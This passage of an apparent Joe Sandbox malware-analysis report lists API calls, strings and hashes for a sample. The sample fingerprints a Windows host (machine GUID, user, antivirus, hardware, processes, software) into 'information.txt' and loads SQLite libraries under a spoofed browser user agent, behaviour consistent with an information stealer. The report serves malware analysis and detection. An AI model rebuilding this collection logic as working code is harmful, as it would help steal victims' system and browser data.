                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EE3: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,010155C7,?,?,?), ref: 00FF0EFB
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EE3: HeapAlloc.KERNEL32(00000000), ref: 00FF0F02
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EE3: GetLocalTime.KERNEL32(?), ref: 00FF0F0E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EE3: wsprintfA.USER32 ref: 00FF0F39
                                                                                                                                                                                                                                                            • Part of subcall function 00FF17F7: _memset.LIBCMT ref: 00FF182A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF17F7: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00FF1849
                                                                                                                                                                                                                                                            • Part of subcall function 00FF17F7: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00FF186E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF17F7: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00FF187A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF17F7: CharToOemA.USER32(?,?), ref: 00FF188E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF18A7: GetCurrentHwProfileA.ADVAPI32(?), ref: 00FF18C2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF18A7: _memset.LIBCMT ref: 00FF18F1
                                                                                                                                                                                                                                                            • Part of subcall function 00FF18A7: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00FF1919
                                                                                                                                                                                                                                                            • Part of subcall function 00FF18A7: lstrcatA.KERNEL32(?,01015DFC,?,?,?,?,?), ref: 00FF1936
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00FF0BF8
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FF0C38
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00FF0C8D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00FF0C94
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(Path: ,01015864,HWID: ,01015858,GUID: ,0101584C,00000000,MachineID: ,0101583C,00000000,Date: ,01015830,0101582C,11.3,Version: ,010155C7), ref: 00FF3FB8
                                                                                                                                                                                                                                                            • Part of subcall function 00FF246D: OpenProcess.KERNEL32(00000410,00000000,00FF3FC7,00000000,?), ref: 00FF248F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF246D: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00FF24AA
                                                                                                                                                                                                                                                            • Part of subcall function 00FF246D: CloseHandle.KERNEL32(00000000), ref: 00FF24B1
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0D53: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D67
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0D53: HeapAlloc.KERNEL32(00000000,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D6E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1A2A: __EH_prolog3_catch_GS.LIBCMT ref: 00FF1A31
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1A2A: CoInitializeEx.OLE32(00000000,00000000,0000004C,00FF40D6,Install Date: ,01015898,00000000,Windows: ,01015888,Work Dir: In memory,01015870), ref: 00FF1A42
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1A2A: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FF1A53
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1A2A: CoCreateInstance.OLE32(01011F18,00000000,00000001,01011E48,?), ref: 00FF1A6D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1A2A: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FF1AA3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1A2A: VariantInit.OLEAUT32(?), ref: 00FF1AFE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1BBA: __EH_prolog3_catch.LIBCMT ref: 00FF1BC1
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1BBA: CoInitializeEx.OLE32(00000000,00000000,00000030,00FF4144,?,AV: ,010158AC,Install Date: ,01015898,00000000,Windows: ,01015888,Work Dir: In memory,01015870), ref: 00FF1BD0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1BBA: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FF1BE1
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1BBA: CoCreateInstance.OLE32(01011F18,00000000,00000001,01011E48,?), ref: 00FF1BFB
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1BBA: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FF1C31
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1BBA: VariantInit.OLEAUT32(?), ref: 00FF1C80
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EA8: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE1375), ref: 00FF0EB4
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EA8: HeapAlloc.KERNEL32(00000000,?,?,?,00FE1375), ref: 00FF0EBB
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EA8: GetComputerNameA.KERNEL32(00000000,00FE1375), ref: 00FF0ECF
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE13A9), ref: 00FF0E82
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: HeapAlloc.KERNEL32(00000000,?,?,?,00FE13A9), ref: 00FF0E89
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: GetUserNameA.ADVAPI32(00000000,00FE13A9), ref: 00FF0E9D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1786: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00FF1798
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1786: GetDeviceCaps.GDI32(00000000,00000008), ref: 00FF17A3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1786: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FF17AE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1786: ReleaseDC.USER32(00000000,00000000), ref: 00FF17B9
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1786: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00FF4275,?,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC), ref: 00FF17C5
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1786: HeapAlloc.KERNEL32(00000000,?,?,00FF4275,?,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF17CC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1786: wsprintfA.USER32 ref: 00FF17DE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0FFE: GetKeyboardLayoutList.USER32(00000000,00000000,010157B7,?,?), ref: 00FF102F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0FFE: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF103D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0FFE: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00FF104B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0FFE: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00FF107A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0FFE: LocalFree.KERNEL32(00000000), ref: 00FF1122
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0F51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FF0F6C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0F51: HeapAlloc.KERNEL32(00000000), ref: 00FF0F73
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0F51: GetTimeZoneInformation.KERNEL32(?), ref: 00FF0F82
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0F51: wsprintfA.USER32 ref: 00FF0FA0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1174: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914), ref: 00FF1188
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1174: HeapAlloc.KERNEL32(00000000,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914,Keyboard Languages: ,010158F8), ref: 00FF118F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1174: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,01015870,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ), ref: 00FF11AD
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1174: RegQueryValueExA.KERNEL32(01015870,00000000,00000000,00000000,000000FF,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000), ref: 00FF11C9
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1174: RegCloseKey.ADVAPI32(01015870,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914,Keyboard Languages: ,010158F8), ref: 00FF11D2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF122A: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00FF12A0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF122A: wsprintfA.USER32 ref: 00FF12FE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF11DD: GetSystemInfo.KERNEL32(?), ref: 00FF11F7
                                                                                                                                                                                                                                                            • Part of subcall function 00FF11DD: wsprintfA.USER32 ref: 00FF120F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF133C: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,010158F8,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF1354
                                                                                                                                                                                                                                                            • Part of subcall function 00FF133C: HeapAlloc.KERNEL32(00000000), ref: 00FF135B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF133C: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00FF1377
                                                                                                                                                                                                                                                            • Part of subcall function 00FF133C: wsprintfA.USER32 ref: 00FF139D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF16C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010157BE,?,?), ref: 00FF16F7
                                                                                                                                                                                                                                                            • Part of subcall function 00FF16C8: Process32First.KERNEL32(00000000,00000128), ref: 00FF1707
                                                                                                                                                                                                                                                            • Part of subcall function 00FF16C8: Process32Next.KERNEL32(00000000,00000128), ref: 00FF1765
                                                                                                                                                                                                                                                            • Part of subcall function 00FF16C8: CloseHandle.KERNEL32(00000000), ref: 00FF1770
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,010157BB,00000000,?,?), ref: 00FF1496
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00FF14D3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: wsprintfA.USER32 ref: 00FF1500
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00FF151F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00FF1555
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: lstrlenA.KERNEL32(?), ref: 00FF156A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,01015DBC), ref: 00FF15FF
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegCloseKey.ADVAPI32(?), ref: 00FF1669
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegCloseKey.ADVAPI32(?), ref: 00FF1695
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,010158F8,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000), ref: 00FF4740
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                                                          • String ID: 11.3$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                          • API String ID: 478979899-3951908000
                                                                                                                                                                                                                                                          • Opcode ID: e5403c791d43657832041b6005f4a316331bc35dd48686557decd47e9f5ab88f
                                                                                                                                                                                                                                                          • Instruction ID: 2a4000b7f3a700778dbe5f2fb6f99566760033ca80ec99046594c59401dd1a9f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5403c791d43657832041b6005f4a316331bc35dd48686557decd47e9f5ab88f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25522E32D0015EAADF40FBA5EC429EDB775AF01300F5245A1AA1077137DFB97E4AAAD0
                                                                                                                                                                                                                                                          Function 00FF6B93 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249sleepCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF076C: lstrlenA.KERNEL32(?,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF0772
                                                                                                                                                                                                                                                            • Part of subcall function 00FF076C: lstrcpyA.KERNEL32(00000000,00000000,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF07A4
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6AF7
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: lstrlenA.KERNEL32(?), ref: 00FF6B02
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: StrStrA.SHLWAPI(00000000,?), ref: 00FF6B17
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: lstrlenA.KERNEL32(?), ref: 00FF6B26
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: lstrlenA.KERNEL32(00000000), ref: 00FF6B3F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6C7D
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6CD6
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6D36
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6D8F
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6DA5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6DBB
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6DCD
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 00FF6DDC
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • sqlo.dll, xrefs: 00FF6EAA
                                                                                                                                                                                                                                                          • ERROR, xrefs: 00FF6DB3
                                                                                                                                                                                                                                                          • ERROR, xrefs: 00FF6DC5
                                                                                                                                                                                                                                                          • ERROR, xrefs: 00FF6D9D
                                                                                                                                                                                                                                                          • ERROR, xrefs: 00FF6C75
                                                                                                                                                                                                                                                          • ERROR, xrefs: 00FF6CCE
                                                                                                                                                                                                                                                          • sqlo.dll, xrefs: 00FF6EDB
                                                                                                                                                                                                                                                          • sqlite3.dll, xrefs: 00FF6E79
                                                                                                                                                                                                                                                          • sqlite3.dll, xrefs: 00FF6E45
                                                                                                                                                                                                                                                          • ERROR, xrefs: 00FF6D87
                                                                                                                                                                                                                                                          • ERROR, xrefs: 00FF6D2E
                                                                                                                                                                                                                                                          • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 00FF6E8B
                                                                                                                                                                                                                                                          • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 00FF6EBC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$sqlite3.dll$sqlite3.dll$sqlo.dll$sqlo.dll
                                                                                                                                                                                                                                                          • API String ID: 2840494320-2782864256
                                                                                                                                                                                                                                                          • Opcode ID: c1859fb64b6113793bec0f76e4ccdf4166cdc85b8309d8af74c6ccc68fc6e624
                                                                                                                                                                                                                                                          • Instruction ID: 79ff02477260236a32818b8b23ab03f335597ce7e23f860132b5275d5df1f08a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1859fb64b6113793bec0f76e4ccdf4166cdc85b8309d8af74c6ccc68fc6e624
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9091FA32E4021C9BCB50FB66EC429ADB775BF40700F514165FA44BB126DF79BE09AB84
                                                                                                                                                                                                                                                          Function 00FE1656 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1182 fe1656-fe168e GetTempPathW 1183 fe17f9-fe17fb 1182->1183 1184 fe1694-fe16bb wsprintfW 1182->1184 1185 fe17ea-fe17f8 call ffcab4 1183->1185 1186 fe16c0-fe16e5 CreateFileW 1184->1186 1186->1183 1188 fe16eb-fe173e GetProcessHeap RtlAllocateHeap _time64 srand rand call 10036b0 WriteFile 1186->1188 1188->1183 1192 fe1744-fe174a 1188->1192 1192->1183 1193 fe1750-fe178c call 10036b0 CloseHandle CreateFileW 1192->1193 1193->1183 1196 fe178e-fe17a1 ReadFile 1193->1196 1196->1183 1197 fe17a3-fe17a9 1196->1197 1197->1183 1198 fe17ab-fe17e1 call 10036b0 GetProcessHeap RtlFreeHeap CloseHandle 1197->1198 1198->1186 1201 fe17e7-fe17e9 1198->1201 1201->1185
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00FE1686
                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00FE16AC
                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 00FE16D6
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 00FE16EE
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00FE16F5
                                                                                                                                                                                                                                                          • _time64.MSVCRT ref: 00FE16FE
                                                                                                                                                                                                                                                          • srand.MSVCRT ref: 00FE1705
                                                                                                                                                                                                                                                          • rand.MSVCRT ref: 00FE170E
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE171E
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00FE1736
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE1753
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00FE1761
                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 00FE177D
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00FE1799
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE17AE
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FE17B8
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00FE17BF
